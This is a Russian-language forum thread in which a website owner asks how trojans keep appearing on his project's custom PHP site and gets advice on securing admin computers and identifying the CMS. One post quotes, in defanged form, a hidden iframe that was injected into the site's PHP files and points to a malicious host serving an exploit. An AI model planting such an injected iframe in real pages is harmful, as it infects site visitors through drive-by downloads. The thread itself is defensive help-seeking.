|
Автор |
Сообщение |
petrelius1150
Завсегдатай
Зарегистрирован: 25.01.2009 Сообщения: 492 Откуда: С-Петербург, Россия
|
|
|
|
У нашего научно-образовательного проекта есть сайт. Примерно раз в полгода на нем заводится какой-нибудь вирус или троян. Как они туда попадают и что надо делать, чтобы избежать этого? |
|
Вернуться к началу |
|
|
den
Старожил
Зарегистрирован: 31.01.2006 Сообщения: 13870 Откуда: Кировоград, Украина
|
|
|
|
в первую очередь нужно обезопасить компьютеры админиов, которые обновляют сайт |
|
Вернуться к началу |
dhsilabs@jabber.ru |
|
|
petrelius1150
Завсегдатай
Зарегистрирован: 25.01.2009 Сообщения: 492 Откуда: С-Петербург, Россия
|
|
|
|
На них установлен лицензионный "Касперский", который всё время обновляется. Пароли нигде никогда не сохраняем. Каждый раз вводим. По почте не пересылаем. |
|
Вернуться к началу |
|
|
den
Старожил
Зарегистрирован: 31.01.2006 Сообщения: 13870 Откуда: Кировоград, Украина
|
|
|
|
А какой движок на сайте? |
|
Вернуться к началу |
dhsilabs@jabber.ru |
|
|
petrelius1150
Завсегдатай
Зарегистрирован: 25.01.2009 Сообщения: 492 Откуда: С-Петербург, Россия
|
|
|
|
Движок нам делали на заказ. Если я что-нибудь не перепутал, он сделан на PHP 5, использует MySQL 4. Система администрирования CMS. |
|
Вернуться к началу |
|
|
Tuxik
Тяпницо
Зарегистрирован: 02.07.2007 Сообщения: 1521
|
|
|
|
petrelius1150, разных CMS много, например, joomla - та же CMS. |
|
Вернуться к началу |
|
|
petrelius1150
Завсегдатай
Зарегистрирован: 25.01.2009 Сообщения: 492 Откуда: С-Петербург, Россия
|
|
|
|
Tuxik, а как узнать, какая у нас? |
|
Вернуться к началу |
|
|
Tuxik
Тяпницо
Зарегистрирован: 02.07.2007 Сообщения: 1521
|
|
|
|
1. Обратиться к разработчику сайта.
2. Посмотреть информацию внизу страницы сайта (и увидеть там, например, "Powered by PunBB" или "Сайт работает на UMI.CMS") )))
3. Посмотреть исходный текст странички.
4. Или вот так: http://www.xakep.ru/magazine/xa/104/052/2.asp ))) |
|
Вернуться к началу |
|
|
den
Старожил
Зарегистрирован: 31.01.2006 Сообщения: 13870 Откуда: Кировоград, Украина
|
|
|
|
Tuxik, +1 |
|
Вернуться к началу |
dhsilabs@jabber.ru |
|
|
petrelius1150
Завсегдатай
Зарегистрирован: 25.01.2009 Сообщения: 492 Откуда: С-Петербург, Россия
|
|
|
|
Обращаться к разработчику сайта не хочется, а так, несмотря на попытки использовать ваши советы, установить ничего не удаётся, хотя я имею полный доступ по ftp и в системы администрирования, которых 2 штуки. |
|
Вернуться к началу |
|
|
yok
Участник тусовки
Зарегистрирован: 06.02.2008 Сообщения: 260 Откуда: krasnodar
|
|
|
|
А как Вы определяете что на сайте вирусы?
У Вас сервер не локальный предполагаю, раз есть доступ по фтп. Хотя возможно и для локального.
Обычно сервер на юникс системах, а там виндовс вирусы лежат как на блюдечке. |
|
Вернуться к началу |
|
|
petrelius1150
Завсегдатай
Зарегистрирован: 25.01.2009 Сообщения: 492 Откуда: С-Петербург, Россия
|
|
|
|
Представьте, нашему руководителю проекта постоянно не везёт. Он который раз первым натыкается на эти вирусы. В результате, его компьютер оказывается заражённым и он несколько дней потом чистит его от вируса.
Выглядело это в последний раз так. После его сообщения я попробовал зайти на сайт и антивирус предупредил меня о трояне Exploit.JS.Pdfka.ti. Я зашел по FTP и обнаружил, что 4 файла *.php имеют сегодняшнюю дату создания, в отличие от остальных, датированных 2008 годом. В этих файлах я обнаружил добавленную строку:
<iframe src="http://kораеvа.sеrvеgаmе.соm:8О8О/ts/in.cgi?ореn6" width=821 height=0 style="visibility: hidden"></iframe>, которая, как я понял и является ссылкой на троян. Удалил эти строки, вроде всё нормализовалось. Только непонятно, как они туда попали?
Денис, не волнуйся, прежде чем поместить на твой сайт эту строку, я сделал так, что ссылка работать не будет, заменив латинские буквы на русские. |
|
Вернуться к началу |
|
|
petrelius1150
Завсегдатай
Зарегистрирован: 25.01.2009 Сообщения: 492 Откуда: С-Петербург, Россия
|
|
|
|
Наш сайт www.agroatlas.ru
Он находится на сервере С-Петербургского государственного университета. |
|
Вернуться к началу |
|
|
Tuxik
Тяпницо
Зарегистрирован: 02.07.2007 Сообщения: 1521
|
|
|
|
petrelius1150 писал(а): |
а так, несмотря на попытки использовать ваши советы, установить ничего не удаётся, хотя я имею полный доступ по ftp и в системы администрирования, которых 2 штуки |
А подробности узнать можно? Ну, конкретный действия и чем они закончились? А то остается только догадываться.
В принципе, не исключено что CMS самописная. Но все же, полагаю, что была взята бесплатно распространяемая CMS и была модифицирована.
petrelius1150 писал(а): |
Удалил эти строки, вроде всё нормализовалось |
Все верно сделал! |
|
Вернуться к началу |
|
|
Tuxik
Тяпницо
Зарегистрирован: 02.07.2007 Сообщения: 1521
|
|
Вернуться к началу |
|
|
|
|